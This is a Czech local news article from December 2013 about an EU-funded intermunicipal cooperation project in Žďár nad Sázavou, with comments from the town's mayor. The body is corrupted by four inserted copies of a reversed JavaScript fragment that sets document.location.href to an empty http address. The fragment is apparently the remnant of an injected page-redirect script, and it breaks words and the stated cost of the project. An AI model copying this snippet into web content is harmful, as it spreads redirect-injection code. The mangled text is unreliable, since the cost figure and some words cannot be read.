Žďár nad Sázavou, aktuality, meziobecní spolupráce
Rainbow page separator

Od ledna ve Žďáře začne projekt meziobecní spolupráce

Pondělí, 30. prosince 2013

Žďár nad Sázavou / Projekt meziobecní spolupráce, kterého se účastní Žďár nad Sázavou, odstartuje 1. ledna. Projekt je podporován evropskými penězi, tříčlenný realizační tým bude patřit po dobu 19 měsíců mezi zaměstnance žďárské radnice a zpracuje čtyři strategické oblasti – sociální věci, školství, nakládání s odpady a dopravní obslužnost. Navíc si pak zvolí ještě jedno téma.
Žďár po dohodě s okolními obcemi tak může například nechat posoudit oblast podpory turistického ruchu v regionu, případně zadat jiné vhodné téma. Žďárskou radnici bude stát zapojení externích pracovníků do procesu s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tisíc korun.
„Projekt může pomoci i neuvolněným starostům. Byli bychom rádi, kdyby pomocí něj rychleji aplikovali do praxe nové vyhlášky a jeho výsledky jim pomohly při vytváření rozpočtů či třeba přípravě žádostí o granty a dotace,“ uvedla žďárská starostka Dagmar Zvěřinová s tím, že mezi výhody dlouhodobé meziobecní spolupráce patří sdílení informací, zkušeností či činností mezi menšími sídly. Tím[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to způsobem už například řadu let spolupracují malé obce v Rakousku či Švýcarsku.